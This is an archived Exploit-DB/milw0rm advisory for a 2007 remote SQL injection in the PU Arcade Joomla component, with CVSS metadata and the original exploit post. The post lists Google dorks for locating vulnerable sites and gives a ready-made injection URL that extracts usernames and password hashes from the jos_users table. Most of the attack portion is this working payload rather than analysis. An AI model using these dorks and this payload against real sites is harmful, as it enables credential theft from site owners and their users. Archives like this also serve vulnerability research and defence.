Joomla Component PU Arcade Remote SQL Injection Exploit

vendor:

PU Arcade Joomla Component

by:

HouSSamix

5.5

CVSS

MEDIUM

Remote SQL Injection

CWE

Product Name: PU Arcade Joomla Component

Affected Version From: 2.0.3

Affected Version To: 2.1.3 Beta

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Joomla Component PU Arcade Remote SQL Injection Exploit

This exploit targets the PU Arcade Joomla Component and allows an attacker to perform a remote SQL injection attack. By exploiting a vulnerability in the component, the attacker can retrieve the usernames and passwords from the jos_users table. The exploit URL is provided in the text.

Mitigation:

Apply the latest patch provided by the vendor.

Source

Exploit-DB raw data:

#########################################################################
          Joomla Component  PU Arcade Remote SQL Injection Exploit
#########################################################################

## AUTHOR :  HouSSamix of H-T TeaM
We are ( HouSSamix _ ToXiC350 _ CoNaN ) 

## HOME : http://no-hack.net

## Script :  PU Arcade Joomla Component ( Tested in version 2.0.3 & 2.1.3 Beta )

## Download : http://www.pragmaticutopia.com/

## DorKs :  PU Arcade by www.pragmaticutopia.com
                         inurl:index.php?option=com_puarcade
                         inurl:/option,com_puarcade/
			
## EXPLOIT :

http://server.com/Path/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--


## GREETZ  :  GoLd_M , RoMaNcYxHaCkEr , Jiko , cx0x  and all musulmans hackers

#########################################################################
           Joomla Component  PU Arcade Remote SQL Injection Exploit
#########################################################################

# milw0rm.com [2007-12-31]